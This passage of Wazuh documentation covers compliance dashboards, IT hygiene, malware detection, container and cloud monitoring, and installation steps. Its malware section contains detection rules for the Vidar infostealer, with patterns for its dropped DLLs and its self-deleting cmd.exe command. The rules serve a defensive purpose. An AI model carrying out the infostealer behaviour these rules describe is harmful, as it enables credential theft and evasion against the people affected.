The National Institute of Standards and Technology (NIST) 800-53 is known as Security and Privacy Controls for Federal Information Systems and Organizations. It is a crucial component of the larger NIST Special Publication 800 series.

NIST 800-53 offers recommendations for managing information security and privacy for federal organizations and agencies. It helps organizations safeguard sensitive data while protecting their information systems and data from various threats.

NIST 800-53 module dashboard

You can view the vulnerability detection module results on the Wazuh dashboard which includes vulnerable applications and packages on the monitored endpoint. You can find more information on how Wazuh helps organizations meet the NIST 800-53 standard.

Vulnerability Detection module inventory
TSC

The Trust Services Criteria were developed by the Assurance Services Executive Committee (ASEC) of the AICPA. The TSC has five trust service areas which are security, availability, processing integrity, confidentiality, and privacy. Organizations implement TSC to protect customer data from unauthorized access, use, disclosure, modification or destruction.

Wazuh provides out-of-the-box tags for TSC Common Criterias that give organizations a standardized way to evaluate and report on the effectiveness of their information security policies. You can find more information on how Wazuh helps organizations meet TSC compliance.

The image below shows some of the Common criteria Wazuh helps organizations meet CC7.2 - Requiring ongoing monitoring for all irregular activity indicative of incidents.

TSC common criteria compliance
IT hygiene

IT hygiene refers to the measures that organizations and individuals undertake to maintain the health and security of their IT assets. IT hygiene requires continuous adaptation of practices and processes to counter emerging cybersecurity threats and challenges, fostering a secure and resilient IT environment. Organizations implement IT hygiene practices to prevent cyberattacks, data breaches, and other security concerns that may result in data loss, service disruption, reputational harm, or financial instability.

System inventory

An up-to-date system inventory helps organizations optimize asset visibility in their environment, and is essential for maintaining good IT hygiene. hardware and operating system information, user accounts, installed packages, running processes and services, network ports, users, groups, and browser extensions. Wazuh agents use the Wazuh Syscollector module to collect inventory data from monitored endpoints and send them to the Wazuh server. All data is aggregated into dedicated indices in the Wazuh indexer and accessible through the Wazuh dashboard, enabling rapid detection and remediation without endpoint-by-endpoint inspection.

Navigate to Security operations > IT Hygiene to generate system inventory reports from the Wazuh IT hygiene module on the Wazuh dashboard.

Inventory data on the Wazuh dashboard

You can also generate property-specific reports for a monitored endpoint. For example, you can get a report containing the list of installed software or a list of running processes on a monitored endpoint.

Inventory data download

The inventory data collected can be queried using the Wazuh server API or Wazuh indexer API, which retrieves nested data in JSON format. For example, you can query the package inventory to check for the wazuh-agent package on a monitored endpoint using the Wazuh > Tools > API Console module on the Wazuh dashboard. Command line tools like cURL can also be used to query the inventory database.

Querying the package inventory using the Dev Tools
Security Configuration Assessment

One of the objectives of implementing good IT hygiene is to reduce the attack surface of your organization. The Wazuh SCA module periodically scans monitored endpoints against policies based on the Center for Internet Security (CIS) benchmarks to identify security misconfigurations and flaws. The CIS benchmarks are essential guidelines for establishing a secure baseline configuration for critical assets. This minimizes vulnerabilities resulting from misconfigurations and reduces the risk of security breaches.

The Configuration Assessment module on the Wazuh dashboard provides each agent's SCA scan result. The results show the number of checks performed on the endpoint, how many failed, and the number of checks that passed. It also shows a score calculated based on the number of tests passed, giving you an overview of the level of compliance.

You can gain more insights from the Wazuh dashboard to view the passed and failed checks. Also, you can generate a CSV report to aid remediation activities, thereby improving the endpoint security posture.

SCA results details and download

You can see information such as rationale, remediation steps, and description of the checks performed on the endpoint on the Wazuh dashboard. This information is included in the report generated by Wazuh.

SCA check result details

The SCA scan result above indicates a failure because the endpoint allows you to mount the cramfs file system. You can implement the remediation suggested in the report to improve the security posture.

Vulnerability management

The Wazuh vulnerability detection module identifies vulnerable applications by using vulnerability information available in our Wazuh CTI. Links to specific vulnerabilities on our Wazuh CTI are also available on each vulnerability ID.

Vulnerability Detection inventory dashboard

You can download a report that contains security events related to discovered and resolved vulnerabilities on a monitored endpoint from the Wazuh dashboard. This feature allows you to identify endpoints with unresolved vulnerabilities and keep track of remediation activities.

Vulnerabilities data download

The Wazuh vulnerability detection module also enables you to track remediation activities, which could serve as a progress report on improving or maintaining IT hygiene. For example, when a vulnerability is remediated, an alert is generated on the Wazuh dashboard. This feature detects when a patch or software upgrade resolves a previously detected vulnerability.

Remediation alerts
Malware detection

Malware detection is essential for safeguarding computer systems and networks from cyber threats. Organizations can improve their IT hygiene by identifying and mitigating malicious software that can cause data breaches, system compromises, and financial losses.

Wazuh offers an out-of-the-box ruleset designed to recognize malware patterns and trigger alerts for quick response. Wazuh also allows security analysts to create custom rules tailored to their environment, thereby optimizing their malware detection efforts. For example, we created custom rules to detect Vidar infostealer malware using Wazuh.

<group name="windows,sysmon,vidar_detection_rule,">
<!-- Vidar downloads malicious DLL files on victim endpoint -->
  <rule id="100084" level="10">
    <if_sid>61613</if_sid>
    <field name="win.eventdata.image" type="pcre2">(?i)\\\\.+(exe|dll|bat|msi)</field>
    <field name="win.eventdata.targetFilename" type="pcre2">(?i)\\\\ProgramData\\\\(freebl3|mozglue|msvcp140|nss3|softokn3|vcruntime140)\.dll</field>
    <description>Possible Vidar malware detected. $(win.eventdata.targetFilename) was downloaded on $(win.system.computer)</description>
    <mitre>
      <id>T1056.001</id>
    </mitre>
  </rule>
<!-- Vidar loads malicious DLL files -->
  <rule id="100085" level="12">
    <if_sid>61609</if_sid>
    <field name="win.eventdata.image" type="pcre2">(?i)\\\\.+(exe|dll|bat|msi)</field>
    <field name="win.eventdata.imageLoaded" type="pcre2">(?i)\\\\programdata\\\\(freebl3|mozglue|msvcp140|nss3|softokn3|vcruntime140)\.dll</field>
    <description>Possible Vidar malware detected. Malicious $(win.eventdata.imageLoaded) file loaded by $(win.eventdata.image)</description>
    <mitre>
      <id>T1574.002</id>
    </mitre>
  </rule>
<!-- Vidar deletes itself or a malicious process it creates -->
  <rule id="100086" level="7" frequency="5" timeframe="360">
    <if_sid>61603</if_sid>
    <if_matched_sid>100085</if_matched_sid>
    <field name="win.eventdata.image" type="pcre2">(?i)\\\\cmd.exe</field>
    <match type="pcre2">cmd.exe\\" /c timeout /t \d{1,}.+del /f /q \\".+(exe|dll|bat|msi)</match>
    <description>Possible Vidar malware detected. Malware deletes $(win.eventdata.parentCommandLine)</description>
    <mitre>
      <id>T1070.004</id>
    </mitre>
  </rule>
</group>

The rules above detect specific behaviors of the Vidar infostealer malware and trigger alerts on the dashboard.

Vidar malware alerts

Wazuh boosts its malware detection capabilities by integrating with threat intelligence sources such as VirusTotal, MISP, and more. Wazuh also offers support for integrating third-party malware detection tools such as ClamAV and Windows Defender. By collecting and analyzing logs from third-party malware detection tools, Wazuh provides security analysts with a centralized monitoring platform. Wazuh increases the efficiency in detecting malware by combining diverse threat intelligence from third-party tools, thereby improving the organization's IT hygiene.

The image below shows an alert of an event from VirusTotal processed by the Wazuh server.

VirusTotal finding alert

Wazuh uses CDB lists (constant databases) containing indicators of compromise (IOCs) to detect malware. These lists contain known malware IOCs such as file hashes, IP addresses, and domain names. Wazuh proactively identifies malicious files by comparing the identified IOCs with the information stored in the CDB lists.

Malware detected alert
Regulatory compliance

Regulatory standards provide a global benchmark for best business practices to help improve customer trust and business reputation. Compliance with regulatory standards also helps organizations to enhance their IT hygiene.

Wazuh streamlines the process of meeting regulatory compliance obligations by offering a solution that addresses requirements of industry standards such as PCI DSS, HIPAA, GDPR, and others.

Security operations module

Wazuh uses its capabilities such as the SCA, vulnerability detection, FIM, and more to identify and report compliance violations. It also provides dedicated compliance dashboards to help monitor compliance status, identify improvement areas, and take appropriate remediation actions.

For example, you can get a general overview of the PCI DSS requirement of a monitored endpoint on the Wazuh dashboard.

PCI DSS dashboard

You can drill down to the individual PCI DSS requirement from the Controls tab to discover where the policy violations occurred.

PCI DSS requirement violations

The image below shows alerts generated for vulnerabilities that violate the PCI DSS Requirement 11.2.1.

PCI DSS requirement violation details

This feature is also available for other compliance standards such as GDPR, TSC, HIPAA, and NIST-800-53.

Container security

Container security is an IT practice that is focused on safeguarding containers and their applications against security threats. Organizations can gain visibility into the usage of both containers and the applications they contain by implementing robust security measures in such an environment.

Containers offer lightweight, isolated environments with application code, runtime, and dependencies. They are widely used to deploy and scale applications both on-premises and in the cloud. As container applications and infrastructure become more popular, it becomes essential to protect them from potential threats.

Wazuh for container security

Wazuh integrates with container platforms like Docker and Kubernetes and actively monitors container runtime events, application logs, and overall container health. Wazuh identifies anomalies by evaluating container logs against predefined rules. Additionally, it maintains a record of container engine actions to detect unauthorized activities in a containerized environment. It also monitors health metrics to prevent performance bottlenecks in an organization.

Wazuh container security features comprise monitoring container runtimes, tracking containerized application logs, monitoring container resource utilization, centralized logging, and container alert notifications. This comprehensive set of capabilities enhances security and streamlines incident response.

Container runtime monitoring

Organizations can enhance the security of their containerized applications by monitoring container events. They can proactively address unexpected behavior by promptly responding to alerts triggered by predefined rules. Wazuh also provides insight into container engine interactions and detects irregularities in containerized applications.

Monitoring the container engine

Wazuh captures real-time events performed by the Docker engine via its Docker listener module. This ensures that no crucial Docker event or operation goes undetected.

Monitoring user interaction with Docker resources demonstrates how Wazuh enhances visibility into the interactions of the container engine with the containers and the images.

Docker container user interaction alerts

Wazuh also monitors the creation and destruction of resources in Kubernetes clusters to help identify unauthorized actions and potential security breaches.

The blog post on Auditing Kubernetes with Wazuh demonstrates how to monitor Kubernetes resource interactions with Wazuh.

Kubernetes resource interaction alerts
Monitoring containerized application logs

Wazuh allows organizations to monitor containerized applications. It provides visibility into the applications that are resident in the container. When the application events are forwarded to the Wazuh manager, Security engineers can create custom rules that align with the unique requirements of their organization. This facilitates a highly personalized approach that improves overall visibility into the containers and the applications they host.

The Monitoring container runtime documentation has more information about monitoring containerized application logs.

Monitoring containerized application logs
Monitor container resource utilization with Wazuh

Wazuh tracks and analyzes the resource consumption of containerized applications. It provides insights into the CPU, memory, and network usage statistics of containers, assisting in identifying performance bottlenecks.

Wazuh provides customizable alerts and notifications, enabling organizations to detect and proactively respond to unusual resource spikes or consumption patterns.

The blog post on Docker container security monitoring with Wazuh demonstrates how Wazuh monitors network utilization in a containerized environment.

Monitoring network utilization in a containerized environment
Centralized logging and visualization of containers event

Wazuh centralizes container event logging and visualization. Its scalable indexer aggregates logs into a powerful search and analytics engine, providing real-time insights. This indexer handles event influx while also supporting compliance needs such as log retention policies.

Wazuh enables organizations to view container logs from a customized dashboard. Security professionals can track and analyze unfolding activities, swiftly identifying threats and unauthorized actions. This early detection enables security professionals to respond to security incidents as they arise swiftly, establishing an active approach to minimizing risks.

The image below displays the customized container dashboard of Wazuh, where events from all containers are showcased.

Customized container dashboard
Container alert notification with Wazuh

Wazuh integrates with messaging platforms like email and Slack. It also integrates with case management solutions, like Jira , for incident response and real-time alerting. This ensures that security teams are promptly notified whenever potential threats or unauthorized actions occur in containerized environments.

The documentation on External API integration explains how the Integrator daemon allows Wazuh to connect to external APIs and case management systems tools like PagerDuty.

Connect to external APIs and case management systems
Posture management

Cloud Service Posture Management (CSPM) encompasses a set of practices aimed at safeguarding the security and compliance of cloud environments. This involves the ongoing assessment and monitoring of cloud workloads to pinpoint misconfigurations, vulnerabilities, and potential threats. CSPM also offers actionable remediation steps for addressing security risks, ultimately bolstering the overall security posture of cloud environments.

Wazuh provides security and compliance monitoring for various cloud platforms, including Google Cloud Platform (GCP), Amazon Web Services (AWS), and Microsoft Azure. We leverage Wazuh for CSPM across the platforms listed below.

Google Cloud Platform

Wazuh connects with GCP through the Google Cloud publisher and subscriber services, also known as GCP Pub/Sub. These messaging services facilitate the transmission of log data from a GCP workload to a Wazuh instance. The image below shows the integration between GCP and Wazuh.

Integration between Wazuh and Google Cloud Platform

You can configure your Wazuh instance to receive GCP logs using the Pub/Sub service. Once configured, you can go to the Google Cloud module in the Wazuh dashboard to view logs related to your GCP services. We provide detailed guidelines on configuring Wazuh to receive GCP logs using the Pub/Sub service in our using Wazuh to monitor GCP services documentation.

Using Wazuh to monitor Google Cloud Platform

The image below shows an example log received from a monitored GCP instance on the Wazuh dashboard.

Example GCP log on the Wazuh dashboard
Amazon Web Services

Wazuh provides CSPM to your AWS workloads by monitoring the AWS services and instances. Monitoring your AWS services includes collecting and analyzing log data about your AWS infrastructure using the Wazuh module for AWS.

You can use the Amazon Web Services module in the Wazuh dashboard to view logs related to AWS services.

Enabling AWS module in the Wazuh dashboard

Follow the AWS prerequisite documentation to set up your Wazuh instance for AWS log collection. The documentation shows a list of the supported AWS services that Wazuh can monitor. The image below shows an Amazon Security Hub log received using the CloudWatch service.

Amazon Security Hub log
Amazon Security Hub log – Details

This control is designed to assess the security configuration of S3 buckets by verifying that user permissions are not granted through access control lists (ACLs). It is recommended to use AWS Identity and Access Management (IAM) policies rather than S3 bucket ACLs for managing user permissions.

Microsoft Azure

Wazuh integrates with Azure using the Log Analytics Workspace. The Azure Log Analytics workspace is a service that facilitates storing log data from Azure Monitor and other Azure services, such as Microsoft Defender for Cloud. Wazuh provides a native integration module for Azure that retrieves logs from the Log Analytics Workspace.

Azure Log Analytics Workspace integration with Wazuh overview

We provide detailed guidelines on configuring Wazuh to receive Azure Cloud logs using the Log Analytics Workspace in our Azure Log Analytics documentation. Once configured, you can set up your Wazuh deployment to retrieve Recommendations, Security alerts, and Regulatory compliance logs for your Azure cloud infrastructure.

The image below shows Azure security posture management logs received on Wazuh.

Azure security posture management logs
Cloud workload protection

The Wazuh security platform provides threat detection, configuration compliance, and continuous monitoring for on-premises, cloud, and hybrid environments. It protects cloud workloads by monitoring the infrastructure at two levels:

  • Endpoint level: monitoring cloud instances or virtual machines using the lightweight Wazuh agent.

  • Cloud infrastructure level: monitoring cloud service activity by collecting and analyzing data from the provider API. Wazuh supports Amazon AWS, Microsoft Azure, and Google Cloud.

We describe some benefits of using Wazuh to enhance security operations, protect cloud-native applications, and facilitate compliance efforts for a secure cloud environment.

Cloud log data analysis and retention

Cloud environments generate large amounts of log data, vital for identifying security incidents. The Wazuh rules and decoders are responsible for parsing and analyzing log data to detect anomalous events. Wazuh collects and analyzes log data from various cloud platforms and services, such as AWS, Azure, Google Cloud, Office 365, and GitHub.

The image below is an example of an AWS dashboard on Wazuh showing the trend of events collected from the cloud infrastructure.

AWS dashboard on Wazuh

Wazuh monitors and logs activities in the cloud, providing a centralized view of user actions across the entire cloud infrastructure. Wazuh has out-of-the-box rules to detect suspicious or unauthorized activities. In addition to the in-built rules, users can create custom rules to consolidate threat detection.

Amazon web services

Wazuh has dedicated modules for monitoring and securing AWS cloud infrastructure. Some of the AWS services that Wazuh monitors include:

  • Amazon Guardduty is a threat detection service that continuously monitors for malicious activity and unauthorized behavior, ensuring the protection of AWS accounts, workloads, and data stored in Amazon S3.

  • Amazon Inspector is an automated security assessment service that helps improve the security and compliance of applications deployed on AWS.

  • Amazon Key Management Service (KMS) is used for cryptographic key management across AWS services.

  • Amazon Macie is a fully managed data security and privacy service. It automatically detects unencrypted S3 buckets, publicly accessible buckets, and buckets shared with external AWS accounts.

  • Amazon Virtual Private Cloud (VPC) provisions a logically isolated section of the AWS Cloud where AWS resources can be launched on a virtual network defined by the user.

  • AWS Config assesses, audits, and evaluates the configurations of your AWS resources. It helps the users review changes in configurations and relationships between AWS resources.

  • AWS Cloudtrail enables governance, compliance, operational auditing, and risk auditing of your AWS account. With CloudTrail, you can log, continuously monitor, and retain account activity related to actions across your AWS infrastructure.

  • AWS Trusted Advisor helps users reduce costs, increase performance, and improve security by optimizing their AWS environment. It provides real-time guidance to help users provision their resources following AWS best practices.

  • AWS Web Application Firewall (WAF) helps protect your web applications or APIs against common web exploits that may affect availability, compromise security, or consume excessive resources.

Microsoft Azure

Wazuh has a dedicated module that pulls logs from and monitors Azure platform. This module obtains data from critical Azure services, including:

  • Log Analytics API: The Log Analytics API is a core component of the Azure Monitor service and is used to aggregate and analyze log data. The sources of such data are cloud applications, operating systems, and Azure resources. The Wazuh module for Azure is capable of querying the Log Analytics API, pulling the logs collected by the Azure Monitor service.

  • Blob Storage API: Logs from Azure services are optionally pushed to Azure Blob Storage. Specifically, it is possible to configure an Azure service to export logs to a container in a storage account created for that purpose. Afterward, the Wazuh agent will download those logs via its integration with the Blob Storage API.

  • Active Directory Graph API: The Azure Active Directory (AD) Graph API provides access to AZURE AD through REST API endpoints. It is used by Wazuh to monitor Active Directory events (for example, creation of a new user, update of user properties, disablement of user accounts, etc.)

Google Cloud Platform

Wazuh monitors Google Cloud services by pulling events from the Google Pub/Sub messaging service, a middleware for event ingestion and delivery. This integration helps detect threats targeting your Google Cloud assets. For more information, please refer to Using Wazuh to monitor GCP services.

Office 365

Wazuh includes a dedicated module designed to interact with the Office 365 Management Activity API. This module is responsible for fetching logs from Office 365 and making them available for analysis within the Wazuh platform. The Management Activity API serves as the source of audit logs for Office 365, containing information about various actions and events within the Office 365 environment. These logs are organized into tenant-specific content blobs and classified based on their content type and source. Wazuh performs analysis, alerting, and reporting on these logs, enhancing the security and compliance monitoring capabilities within the Office 365 environment. For more detailed information, please refer to Using Wazuh to monitor Office 365.

GitHub

Wazuh has a GitHub module that utilizes the GitHub API to pull GitHub audit logs, which contain information about actions performed by organization members. This log includes essential details such as the user who initiated the action, the nature of the action (e.g., repository creation, access changes, etc.), the timestamp indicating when the action took place and others. Wazuh collects, processes, and stores these logs, enabling analysis, alerting, and reporting. Refer to Using Wazuh to monitor GitHub for more information.

Protect cloud-native applications

Wazuh provides protection for cloud-native applications, safeguarding them against security threats and vulnerabilities. It integrates with container orchestration platforms like Kubernetes and Docker, allowing it to monitor and analyze container activity in real time. Wazuh detects suspicious container behavior, unauthorized image changes, and potential security misconfigurations, ensuring the overall integrity of containerized applications.

The image below shows alerts generated from a monitored Docker infrastructure.

Docker infrastructure alerts

Some additional use cases for using Wazuh to monitor cloud-native applications are:

Furthermore, the Wazuh integration with cloud service providers enables monitoring and analysis of cloud-native application logs, ensuring comprehensive visibility into the environment and facilitating effective security operations.

Promote security operations in the cloud

Wazuh promotes security operations within cloud environments by allowing security teams to detect and respond to threats, mitigating damages, and reducing the overall impact on the cloud infrastructure. Furthermore, Wazuh facilitates red and blue team activities. The platform's customizable rules enable organizations to simulate attacks and test their security defenses. Blue teams can use the insights gained on Wazuh from red team activities to fine-tune their security measures and strengthen their defenses. The following resources demonstrate how to use the Stratus Red Team tool to simulate attacks on some cloud platforms and how to detect them with Wazuh:

Detection results

The centralized logging and reporting capabilities of Wazuh simplify compliance management within cloud environments. It helps organizations meet regulatory requirements by capturing and storing audit trails, ensuring accountability, and facilitating the investigation of security incidents. Refer to the Wazuh dashboard documentation for more information about how Wazuh aids analysis, reporting, and compliance efforts.

Quickstart

Wazuh is a security platform that provides unified XDR and SIEM protection for endpoints and cloud workloads. The solution is composed of a single universal agent and three central components: the Wazuh server, the Wazuh indexer, and the Wazuh dashboard. For more information, check the Getting Started documentation.

Wazuh is free and open source. Its components abide by the GNU General Public License, version 2, and the Apache License, Version 2.0 (ALv2).

This quickstart shows you how to install the Wazuh central components, on the same host, using our installation assistant. You can check our Installation guide for more details and other installation options.

Below you can find a section about the requirements needed to install Wazuh. It will help you learn about the hardware requirements and the supported operating systems for your Wazuh installation.

Requirements

Hardware

Hardware requirements highly depend on the number of protected endpoints and cloud workloads. This number can help estimate how much data will be analyzed and how many security alerts will be stored and indexed.

Following this quickstart implies deploying the Wazuh server, the Wazuh indexer, and the Wazuh dashboard on the same host. This is usually enough for monitoring up to 100 endpoints and for 90 days of queryable/indexed alert data. The table below shows the recommended hardware for a quickstart deployment:

Agents

CPU

RAM

Storage (90 days)

1–25

4 vCPU

8 GiB

50 GB

25–50

8 vCPU

8 GiB

100 GB

50–100

8 vCPU

8 GiB

200 GB

For larger environments we recommend a distributed deployment. Multi-node cluster configuration is available for the Wazuh server and for the Wazuh indexer, providing high availability and load balancing.

Operating system

The Wazuh central components require a 64-bit Intel, AMD, or ARM Linux processor (x86_64/AMD64 or AARCH64/ARM64 architecture) to run. Wazuh recommends any of the following operating system versions:

  • Amazon Linux 2, Amazon Linux 2023

  • CentOS Stream 10

  • Red Hat Enterprise Linux 7, 8, 9, 10

  • Ubuntu 16.04, 18.04, 20.04, 22.04, 24.04

Installing Wazuh

  1. Download and run the Wazuh installation assistant.

    $ curl -sO https://packages.wazuh.com/5.0/wazuh-install.sh && sudo bash ./wazuh-install.sh -a
    

    Once the assistant finishes the installation, the output shows the access credentials and a message that confirms that the installation was successful.

    INFO: --- Summary ---
    INFO: You can access the web interface https://<WAZUH_DASHBOARD_IP_ADDRESS>
        User: admin
        Password: <ADMIN_PASSWORD>
    INFO: Installation finished.
    

    You now have installed and configured Wazuh.

  2. Access the Wazuh web interface with https://<WAZUH_DASHBOARD_IP_ADDRESS> and your credentials:

    • Username: admin

    • Password: <ADMIN_PASSWORD>

When you access the Wazuh dashboard for the first time, the browser shows a warning message stating that the certificate was not issued by a trusted authority. This is expected and the user has the option to accept the certificate as an exception or, alternatively, configure the system to use a certificate from a trusted authority.

Note

You can find the passwords for all the Wazuh indexer and Wazuh API users in the wazuh-passwords.txt file inside wazuh-install-files.tar. To print them, run the following command:

$ sudo tar -O -xvf wazuh-install-files.tar wazuh-install-files/wazuh-passwords.txt

If you want to uninstall the Wazuh central components, run the Wazuh installation assistant using the option -u or –-uninstall.

Note

Recommended Action: Disable Wazuh Updates.

We recommend disabling the Wazuh package repositories after installation to prevent accidental upgrades that could break the environment.

Execute the following command to disable the Wazuh repository:

# sed -i "s/^enabled=1/enabled=0/" /etc/yum.repos.d/wazuh.repo

Next steps

Now that your Wazuh installation is ready, you can start deploying the Wazuh agent. This can be used to protect laptops, desktops, servers, cloud instances, containers, or virtual machines. The agent is lightweight and multi-purpose, providing a variety of security capabilities.

Instructions on how to deploy the Wazuh agent can be found in the Wazuh web user interface, or in our documentation.

Installation guide

Wazuh is a security platform that provides unified XDR and SIEM protection for endpoints and cloud workloads. The solution is composed of the Wazuh agent and three central components: the Wazuh server, the Wazuh indexer, and the Wazuh dashboard. For more information, check the Getting Started documentation.

Wazuh is free and open source. Its components abide by the GNU General Public License, version 2, and the Apache License, Version 2.0 (ALv2).

In this installation guide, you will learn how to install Wazuh in your infrastructure. We also offer Wazuh Cloud, our software as a service (SaaS) solution. Wazuh Cloud is ready to use, with no additional hardware or software required, reducing the cost and complexity. Check the Wazuh Cloud service documentation for more information and take advantage of the Wazuh Cloud trial to explore this service.

Installing the Wazuh central components

You can install the Wazuh indexer, Wazuh server, and Wazuh dashboard on a single host or distribute them in cluster configurations. Each Wazuh central component supports two installation methods and both methods provide instructions to install the central components on a single host or on separate hosts.

You can check our Quickstart documentation to perform an all-in-one installation. This is the fastest way to get the Wazuh central components up and running.

For more deployment flexibility and customization, install the Wazuh central components by starting with the Wazuh indexer deployment. This deployment method supports both an all-in-one installation and installing components on separate hosts.

Follow this installation workflow:

Installing the Wazuh agent

The Wazuh agent is a single, lightweight monitoring software. It is a multi-platform component that you can deploy to laptops, desktops, servers, cloud instances, containers, or virtual machines. It provides visibility into the monitored endpoint by collecting critical system and application records, inventory data, and detecting potential anomalies.

Select your endpoint operating system below and follow the installation steps to deploy the Wazuh agent.

Packages list

The Packages list section contains all the packages required for installing Wazuh.

Uninstalling Wazuh

In the Uninstalling Wazuh section, you will find instructions on how to uninstall the Wazuh central components and the Wazuh agent.

Installation alternatives

Wazuh provides other installation alternatives as well. These are complementary to the installation methods of this installation guide. You will find instructions on how to deploy Wazuh using ready-to-use machines, containers, and orchestration tools. There is also information on how to install the solution offline, from sources, and with alternative components.

Wazuh indexer

The Wazuh indexer is a highly scalable, full-text search and analytics engine. It indexes and stores alerts generated by the Wazuh server and provides near real-time data search and analytics capabilities. If you want to learn more about Wazuh components, check the Getting started section.

You can install the Wazuh indexer on a single host or distribute it across multiple nodes in a cluster configuration. The cluster configuration provides scalability, high availability, and improved performance.

Check the requirements below and choose an installation method to start installing the Wazuh indexer.

Requirements

Check the supported operating systems and the recommended hardware requirements for the Wazuh indexer installation. Make sure that your system environment meets all requirements and that you have root user privileges.

Hardware recommendations

You can install the Wazuh indexer as a single-node or multi-node cluster.

  • Hardware recommendations for each node

    Minimum

    Recommended

    Component

    RAM (GB)

    CPU (cores)

    RAM (GB)

    CPU (cores)

    Wazuh indexer

    4

    2

    16

    8

  • Disk space requirements: The amount of disk space required depends on the generated alerts per second (APS). This table details the estimated disk space needed per agent to store 90 days of alerts on a Wazuh indexer server, depending on the type of monitored endpoints.

    Monitored endpoints

    APS

    Storage in Wazuh indexer
    (GB/90 days)

    Servers

    0.25

    3.7

    Workstations

    0.1

    1.5

    Network devices

    0.5

    7.4

    For example, for an environment with 80 workstations, 10 servers, and 10 network devices, the storage needed on the Wazuh indexer server for 90 days of alerts is 230 GB.

Installing the Wazuh indexer using the assisted installation method

Install and configure the Wazuh indexer as a single-node or multi-node cluster on a 64-bit (x86_64/AMD64 or AARCH64/ARM64) architecture using the assisted installation method. The Wazuh indexer is a highly scalable full-text search engine. It offers advanced security, alerting, index management, deep performance analysis, and several other features.

Wazuh indexer cluster installation

The installation process is divided into three stages.

  1. Initial configuration

  2. Wazuh indexer nodes installation

  3. Cluster initialization

Note

You need root user privileges to run all the commands described below.

Initial configuration

Follow these steps to configure your Wazuh deployment, create SSL certificates to encrypt communications between the Wazuh components, and generate random passwords to secure your installation.

  1. Download the Wazuh installation assistant and the configuration file.

    # curl -sO https://packages.wazuh.com/5.0/wazuh-install.sh
    # curl -sO https://packages.wazuh.com/5.0/config.yml
    
  2. Edit ./config.yml and replace the node names and IP values with the corresponding names and IP addresses. You need to do this for all Wazuh server, Wazuh indexer, and Wazuh dashboard nodes. Add as many node fields as needed.

    nodes:
      # Wazuh indexer nodes
      indexer:
        - name: node-1
          ip: "<indexer-node-ip>"
        #- name: node-2
        #  ip: "<indexer-node-ip>"
        #- name: node-3
        #  ip: "<indexer-node-ip>"
    
      # Wazuh server nodes
      # If there is more than one Wazuh server
      # node, each one must have a node_type
      server:
        - name: wazuh-1
          ip: "<wazuh-manager-ip>"
        #  node_type: master
        #- name: wazuh-2
        #  ip: "<wazuh-manager-ip>"
        #  node_type: worker
        #- name: wazuh-3
        #  ip: "<wazuh-manager-ip>"
        #  node_type: worker
    
      # Wazuh dashboard nodes
      dashboard:
        - name: dashboard
          ip: "<dashboard-node-ip>"
    
  3. Run the Wazuh installation assistant with the option --generate-config-files to generate the Wazuh cluster key, certificates, and passwords necessary for installation. You can find these files in ./wazuh-install-files.tar.

    # bash wazuh-install.sh --generate-config-files
    
  4. Copy the wazuh-install-files.tar file to all the servers of the distributed deployment, including the Wazuh server, the Wazuh indexer, and the Wazuh dashboard nodes. This can be done by using the scp utility.

Wazuh indexer node installation

Follow these steps to install and configure a single-node or multi-node Wazuh indexer.

  1. Download the Wazuh installation assistant. Skip this step if you performed the initial configuration on the same server and the Wazuh installation assistant is already in your working directory:

    # curl -sO https://packages.wazuh.com/5.0/wazuh-install.sh
    
  2. Run the Wazuh installation assistant with the option --wazuh-indexer and the node name to install and configure the Wazuh indexer. The node name must be the same one used in config.yml for the initial configuration, for example, node-1.

    Note

    Make sure that a copy of wazuh-install-files.tar, created during the initial configuration step, is placed in your working directory.

    # bash wazuh-install.sh --wazuh-indexer node-1
    

Repeat this stage of the installation process for every Wazuh indexer node in your cluster. Then proceed with initializing your single-node or multi-node cluster in the next stage.

Note

For Wazuh indexer installation on hardened endpoints with noexec flag on the /tmp directory, additional setup is required. See the Wazuh indexer configuration on hardened endpoints section for necessary configuration.

Cluster initialization

The final stage of installing the Wazuh indexer single-node or multi-node cluster consists of running the security admin script.

  1. Run the Wazuh installation assistant with option --start-cluster on any Wazuh indexer node to load the new certificates information and start the cluster.

    # bash wazuh-install.sh --start-cluster
    

    Note

    You only have to initialize the cluster once, there is no need to run this command on every node.

Testing the cluster installation

Verify that the Wazuh indexer installed correctly and the Wazuh indexer cluster is functioning as expected by following the steps below.

  1. Run the following command to get the admin password:

    # tar -axf wazuh-install-files.tar wazuh-install-files/wazuh-passwords.txt -O | grep -P "\'admin\'" -A 1
    
  2. Run the following command to confirm that the installation is successful. Replace <WAZUH_INDEXER_IP_ADDRESS> with the IP address of the Wazuh indexer and use the password gotten from the output of the previous command:

    # curl -k -u admin https://<WAZUH_INDEXER_IP_ADDRESS>:9200
    
    {
      "name" : "node-1",
      "cluster_name" : "wazuh-cluster",
      "cluster_uuid" : "095jEW-oRJSFKLz5wmo5PA",
      "version" : {
        "number" : "7.10.2",
        "build_type" : "rpm",
        "build_hash" : "db90a415ff2fd428b4f7b3f800a51dc229287cb4",
        "build_date" : "2023-06-03T06:24:25.112415503Z",
        "build_snapshot" : false,
        "lucene_version" : "9.6.0",
        "minimum_wire_compatibility_version" : "7.10.0",
        "minimum_index_compatibility_version" : "7.0.0"
      },
      "tagline" : "The OpenSearch Project: https://opensearch.org/"
    }
    
  3. Run the following command to check if the cluster is working correctly. Replace <WAZUH_INDEXER_IP_ADDRESS> with the IP address of the Wazuh indexer and enter the password for the Wazuh indexer admin user when it prompts for password:

    # curl -k -u admin https://<WAZUH_INDEXER_IP_ADDRESS>:9200/_cat/nodes?v
    

    The command output should be similar to the following:

    ip              heap.percent ram.percent cpu load_1m load_5m load_15m node.role node.roles                               cluster_manager name
    192.168.107.240           19          94   4    0.22    0.21     0.20 dimr      data,ingest,master,remote_cluster_client *               node-1
    
Disable Wazuh updates

We recommend disabling the Wazuh package repositories after installing all components on this server to prevent accidental upgrades.

Execute the following command only after completing all installations:

# sed -i "s/^deb /#deb /" /etc/apt/sources.list.d/wazuh.list
# apt update
Next steps

The Wazuh indexer is now successfully installed, and you can proceed with installing the Wazuh server. To perform this action, see the Installing the Wazuh server using the assisted installation method section.

Installing the Wazuh indexer step by step

Install and configure the Wazuh indexer as a single-node or multi-node cluster following step-by-step instructions. Wazuh indexer is a highly scalable full-text search engine and offers advanced security, alerting, index management, deep performance analysis, and several other features.

The installation process is divided into three stages:

  1. Certificate creation

  2. Wazuh indexer nodes installation

  3. Cluster initialization

Note

You need root user privileges to run all the commands described below.

Certificate creation

Wazuh uses certificates to establish confidentiality and encrypt communications between its central components. Follow these steps to create certificates for the Wazuh central components.

Generating the SSL certificates
